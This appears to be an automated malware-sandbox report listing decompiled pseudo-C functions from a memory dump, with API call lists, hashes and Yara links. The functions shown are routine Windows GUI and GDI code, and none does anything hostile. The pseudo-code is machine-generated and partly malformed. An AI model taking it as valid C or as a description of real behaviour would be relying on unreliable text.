C-Code - Quality: 67%

			E0040C3D0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C0CC();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C0F4();
						if(_t76 != 0) {
							E00402888(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C0FC();
						if(_t79 != 0) {
							E00402888(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C0E4();
				_t107 = _t49;
				if(_t107 == 0) {
					E00402888(0x12);
				}
				E0040C290(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C114();
				if(_t56 != 0) {
					E00402888(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C114();
				if(_t58 != 0) {
					E00402888(0x14);
				}
				_v780();
				_t64 = E0040C374(_v788 - 1, _t109);
			}

0x0040c3dc
0x0040c3e2
0x0040c3e8
0x0040c3ed
0x0040c3f6
0x0040c3f8
0x0040c3f9
0x0040c3ff
0x0040c400
0x00000000
0x0040c400
0x0040c40d
0x0040c41f
0x0040c40f
0x0040c414
0x0040c414
0x0040c42e
0x0040c43a
0x0040c43d
0x0040c43f
0x0040c440
0x0040c442
0x0040c448
0x0040c44a
0x0040c459
0x0040c45a
0x0040c45e
0x0040c464
0x0040c465
0x0040c46c
0x0040c470
0x0040c470
0x0040c47b
0x0040c47c
0x0040c480
0x0040c486
0x0040c487
0x0040c48e
0x0040c492
0x0040c492
0x0040c4ad
0x0040c4af
0x0040c4b0
0x0040c4b3
0x0040c4b3
0x0040c448
0x0040c4bc
0x0040c4bd
0x0040c4c3
0x0040c4c4
0x0040c4c6
0x0040c4cb
0x0040c4cf
0x0040c4d3
0x0040c4d3
0x0040c4de
0x0040c4e9
0x0040c4f4
0x0040c4fd
0x0040c500
0x0040c502
0x0040c503
0x0040c509
0x0040c50f
0x0040c511
0x0040c513
0x0040c516
0x0040c519
0x0040c519
0x0040c51c
0x00000000
0x00000000
0x0040c58c
0x0040c58c
0x0040c51c
0x0040c522
0x0040c529
0x0040c52a
0x0040c530
0x0040c531
0x0040c538
0x0040c53c
0x0040c53c
0x0040c547
0x0040c548
0x0040c54e
0x0040c54f
0x0040c550
0x0040c557
0x0040c55b
0x0040c55b
0x0040c56e
0x0040c57c

APIs

VariantCopy.OLEAUT32(?), ref: 0040C400
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C465
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C487
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C4C6
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C531
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C550

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction ID: e3d9d08425be40a8c17ff51e4185aa0981f6c60c5e0398ee72e90e49a0dc38e2
Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
Instruction Fuzzy Hash: 49510F7590112DDBDB25DB59CC91ADAB3BCBF48344F4042E6E909F7282D634AF818F64

Uniqueness

Uniqueness Score: -1.00%

Function 0042107C, Relevance: 9.1, APIs: 6, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042107C(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408334(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x421373, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00406E30();
				_v44 = _t36;
				if(_v44 == 0) {
					E00420540(_t51);
				}
				_push(_t68);
				_push(0x421165);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00406B00();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00406B00();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042116C);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407090();
				return _t43;
			}

0x0042107d
0x0042107f
0x00421085
0x00421088
0x0042108b
0x0042108e
0x00421097
0x004210a2
0x004210b0
0x004210b6
0x004210be
0x004210c6
0x004210e3
0x004210e8
0x004210ed
0x004210c8
0x004210d2
0x004210d6
0x004210de
0x004210de
0x004210f0
0x004210f2
0x004210f7
0x004210fe
0x00421100
0x00421100
0x00421107
0x00421108
0x0042110d
0x00421110
0x00421113
0x00421115
0x00421118
0x00421119
0x00421120
0x00421122
0x00421125
0x00421126
0x0042112f
0x00421135
0x00421147
0x00421149
0x00421137
0x00421137
0x00421137
0x0042114e
0x00421151
0x00421154
0x00421159
0x0042115c
0x0042115d
0x0042115f
0x00421164

APIs

GetSystemMetrics.USER32 ref: 004210CA
GetSystemMetrics.USER32 ref: 004210D6
72E7AC50.USER32(00000000), ref: 004210F2
72E7AD70.GDI32(00000000,0000000E,00000000,00421165,?,00000000), ref: 00421119
72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00421165,?,00000000), ref: 00421126
72E7B380.USER32(00000000,00000000,0042116C,0000000E,00000000,00421165,?,00000000), ref: 0042115F

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$B380
String ID:
API String ID: 3145338429-0
Opcode ID: b51627bb0a1fa58ccc2dcd3e0166a7d558477a5e981bdc8f0c486c6466243468
Instruction ID: 9308dfa8c1cc9973fabc3a1629e5ff09255cce478b7a861a8919cf7493d277e5
Opcode Fuzzy Hash: b51627bb0a1fa58ccc2dcd3e0166a7d558477a5e981bdc8f0c486c6466243468
Instruction Fuzzy Hash: 7131A274A00214EFEB00DFA5C841BAEBBB5FB49750F50816AF914AB390C638AD41CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004214EC, Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004214EC(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E0042139C(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00406A60();
				_v16 = 0;
				_push(_t46);
				_push(0x421589);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00406BD8();
					_v12 = _t29;
					_push(_v16);
					L00406BA8();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00421590);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00406BD8();
				}
				return DeleteDC(_v16);
			}

0x004214f5
0x004214f9
0x00421502
0x00421509
0x0042150c
0x0042150e
0x00421513
0x00421518
0x00421519
0x0042151e
0x00421521
0x00421526
0x00421528
0x0042152a
0x0042152b
0x0042152e
0x0042152f
0x00421534
0x0042153a
0x0042153b
0x0042153b
0x00421559
0x0042155f
0x00421562
0x00421565
0x0042156e
0x00421570
0x00421575
0x00421579
0x0042157a
0x0042157a
0x00421588

APIs

Part of subcall function 0042139C: GetObjectA.GDI32(?,00000054), ref: 004213B0

72E7A590.GDI32(00000000), ref: 0042150E
72E7B410.GDI32(?,?,00000000,00000000,00421589,?,00000000), ref: 0042152F
72E7B150.GDI32(?,?,?,00000000,00000000,00421589,?,00000000), ref: 0042153B
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421552
72E7B410.GDI32(?,00000000,00000000,00421590,00000000,?,?,?,00000000,00000000,00421589,?,00000000), ref: 0042157A
DeleteDC.GDI32(?), ref: 00421583

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: B410$A590B150BitsDeleteObject
String ID:
API String ID: 3837315262-0
Opcode ID: c7ffae817a4fb1e2d886e0142128761c2e9997eef040b974f49ef668718abe20
Instruction ID: 4c2f870a7c7292c98b5d899b0d77512a1fdb18d44c758e7c42c4dba3647218b1
Opcode Fuzzy Hash: c7ffae817a4fb1e2d886e0142128761c2e9997eef040b974f49ef668718abe20
Instruction Fuzzy Hash: E5118F75B002187FDB10DBA9CC41F9EB7FCEF49710F5184AAB515F7290D678A9408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00435AE8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435AE8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x4718d0; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x4718d0; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x4718d0; // 0x0
				SetPropA(_a4,  *0x48fb72 & 0x0000ffff, _t27);
				_t31 =  *0x4718d0; // 0x0
				SetPropA(_a4,  *0x48fb70 & 0x0000ffff, _t31);
				_t35 =  *0x4718d0; // 0x0
				 *0x4718d0 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x00435aed
0x00435af0
0x00435af8
0x00435afe
0x00435b10
0x00435b25
0x00435b40
0x00435b40
0x00435b45
0x00435b57
0x00435b5c
0x00435b6e
0x00435b7f
0x00435b84
0x00435b94
0x00435b9c

APIs

SetWindowLongA.USER32 ref: 00435B10
GetWindowLongA.USER32 ref: 00435B1B
GetWindowLongA.USER32 ref: 00435B2D
SetWindowLongA.USER32 ref: 00435B40
SetPropA.USER32(?,00000000,00000000), ref: 00435B57
SetPropA.USER32(?,00000000,00000000), ref: 00435B6E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: dceccd7d6609d573a3fd3a61f4eb2a58691cefffe421801bf144bb0a17a05d58
Instruction ID: c4f939e434027b5a8ad6da9d02073f8f4a3cf72295f121b3f7a6c4c28ba548e6
Opcode Fuzzy Hash: dceccd7d6609d573a3fd3a61f4eb2a58691cefffe421801bf144bb0a17a05d58
Instruction Fuzzy Hash: FF11DD75504244BFCB00EF9DDC85D9A37E8BB0C394F118625F968DB2E1D738E9409B65

Uniqueness

Uniqueness Score: -1.00%

Function 00420D2C, Relevance: 9.1, APIs: 6, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00420D2C(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00402994(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L00406A60();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00420C94(_t32) == 0) {
						E00420B24( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00406A88();
					_t31 = _t15;
				}
				return _t31;
			}

0x00420d37
0x00420d39
0x00420d41
0x00420d7b
0x00420d89
0x00420d43
0x00420d43
0x00420d45
0x00420d4a
0x00420d4e
0x00420d67
0x00420d6e
0x00420d74
0x00420d74
0x00420d94
0x00420d9c
0x00420db2
0x00420db2
0x00420db7
0x00420db9
0x00420dba
0x00420dbf
0x00420dbf
0x00420dcc

APIs

72E7A590.GDI32(00000000,00000000,?,?,00424AD3,?,?,?,?,004235DF,00000000,0042366B), ref: 00420D45
SelectObject.GDI32(00000000,00000000), ref: 00420D4E
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424AD3,?,?,?,?,004235DF), ref: 00420D62
SelectObject.GDI32(00000000,00000000), ref: 00420D6E
DeleteDC.GDI32(00000000), ref: 00420D74
72E7A8F0.GDI32(?,00000000,?,?,00424AD3,?,?,?,?,004235DF,00000000,0042366B), ref: 00420DBA

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$A590ColorDeleteTable
String ID:
API String ID: 1056449717-0
Opcode ID: d08077ca725950136e79a229e27704e05b7e80bfaa5b060cab79dba940338797
Instruction ID: 452fad253f54c0d634509e9c7bd6a6a400517d0344b36e04ce999980abad9942
Opcode Fuzzy Hash: d08077ca725950136e79a229e27704e05b7e80bfaa5b060cab79dba940338797
Instruction Fuzzy Hash: BE01966130432066D62477BA9C43F6B72F88FC1718F41D82FB585A72C3E67C9844839A

Uniqueness

Uniqueness Score: -1.00%

Function 0045E4BC, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045E4BC(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043F370(__eax), 0);
				InvalidateRect(E0043F370(_t29), 0, 0xffffffff);
				GetClientRect(E0043F370(_t29), _t30);
				_t18 = E0043F370( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043F370(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043F370( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043F370( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}

0x0045e4c0
0x0045e4cc
0x0045e4dd
0x0045e4eb
0x0045e4fd
0x0045e50b
0x0045e51d
0x0045e53e

APIs

ValidateRect.USER32(00000000,00000000,0045ED10), ref: 0045E4CC
InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045ED10), ref: 0045E4DD
GetClientRect.USER32 ref: 0045E4EB
MapWindowPoints.USER32 ref: 0045E50B
ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045ED10), ref: 0045E51D
InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045E535

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$InvalidateValidate$ClientPointsWindow
String ID:
API String ID: 2846033224-0
Opcode ID: 5924e76df3a7eec3d781882b906674ee73ac976f4d326a2b84aae9fcaaf2ac54
Instruction ID: 0d3d84cfd5b1673468f701fafe6b8462786ace25c5bfd209f9425858ab719b0f
Opcode Fuzzy Hash: 5924e76df3a7eec3d781882b906674ee73ac976f4d326a2b84aae9fcaaf2ac54
Instruction Fuzzy Hash: ACF0AFF0A5470026DA00BA7A8C87F8A328C5B08718F00597E7D19EB2D3DA3DF85C566D

Uniqueness

Uniqueness Score: -1.00%

Function 00420410, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420410(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041F7EC( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041F7EC( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041F8CC( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041EB0C(E0041F7B0( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041EB0C(E0041F7B0( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x00420411
0x0042041c
0x0042042e
0x0042043d
0x00420477
0x00420488
0x0042043f
0x00420451
0x00420462
0x00420462

APIs

Part of subcall function 0041F7EC: CreateBrushIndirect.GDI32(?), ref: 0041F896

UnrealizeObject.GDI32(00000000), ref: 0042041C
SelectObject.GDI32(?,00000000), ref: 0042042E
SetBkColor.GDI32(?,00000000), ref: 00420451
SetBkMode.GDI32(?,00000002), ref: 0042045C
SetBkColor.GDI32(?,00000000), ref: 00420477
SetBkMode.GDI32(?,00000001), ref: 00420482

Part of subcall function 0041EB0C: GetSysColor.USER32(?), ref: 0041EB16

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 3791802644280878c8a9ba423e8e3e1777caffe9a8ee85fcb9d6721126e5de7c
Instruction ID: 47d42b9eba6ec1c28133e811eafa8900c5c1a9b5fd2748ea1de05bbddf51f6bf
Opcode Fuzzy Hash: 3791802644280878c8a9ba423e8e3e1777caffe9a8ee85fcb9d6721126e5de7c
Instruction Fuzzy Hash: 46F0CDB56041109BCA04FFBAD9C7E4B77AC9F043097004066B909DF187CA7DF8648739

Uniqueness

Uniqueness Score: -1.00%

Function 0043C480, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0043C480(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x43c60b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E00435AE8 != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00435AE8;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B2D0(_t83, _t84, _t98, _t100);
						}
					}
					 *0x4718d0 = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B2D0(_t83, _t85, _t98, _t100);
					}
					E00408DBC( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043F680(_t100);
					E00439EA4(_t100, E0041EFE0( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037B0(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x43c612);
					return E00404320( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x48e728; // 0x41d0d4
						E00406520(_t75,  &_v196);
						_t84 = _v196;
						E0040A124(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403D80();
					} else {
						_t97 =  *0x434e14; // 0x434e60
						if(E00403740(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043F370(_t83);
					}
					goto L7;
				}
			}

0x0043c480
0x0043c480
0x0043c489
0x0043c48d
0x0043c493
0x0043c497
0x0043c498
0x0043c49d
0x0043c4a0
0x0043c4ab
0x0043c4ad
0x0043c4b7
0x0043c52c
0x0043c52f
0x0043c544
0x0043c54c
0x0043c54e
0x0043c551
0x0043c562
0x0043c56c
0x0043c56c
0x0043c571
0x0043c57b
0x0043c58a
0x0043c58c
0x0043c58c
0x0043c58a
0x0043c591
0x0043c59f
0x0043c5a1
0x0043c5ae
0x0043c5b0
0x0043c5b0
0x0043c5b8
0x0043c5bf
0x0043c5c4
0x0043c5dc
0x0043c5e1
0x0043c5e5
0x0043c5ed
0x0043c5ed
0x0043c5f4
0x0043c5f7
0x0043c5fa
0x0043c60a
0x0043c4c2
0x0043c4c2
0x0043c4c7
0x0043c4ec
0x0043c4ef
0x0043c4f5
0x0043c50b
0x0043c510
0x0043c515
0x0043c522
0x0043c527
0x0043c4cf
0x0043c4d1
0x0043c4de
0x00000000
0x00000000
0x0043c4e7
0x0043c4e7
0x00000000
0x0043c4c7

APIs

GetClassInfoA.USER32 ref: 0043C544
UnregisterClassA.USER32 ref: 0043C56C
RegisterClassA.USER32 ref: 0043C582

Strings

`NC, xrefs: 0043C4D1
@, xrefs: 0043C4B9

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @$`NC
API String ID: 3749476976-2021207740
Opcode ID: 89fce574dff8b7ea05d7ff18270542b8e03307a4a7e45fe49de226960ab66071
Instruction ID: 1e2d9df29549b5e657a4c7f3d1392662ba96d0e39aba2c5547ea8181207633d2
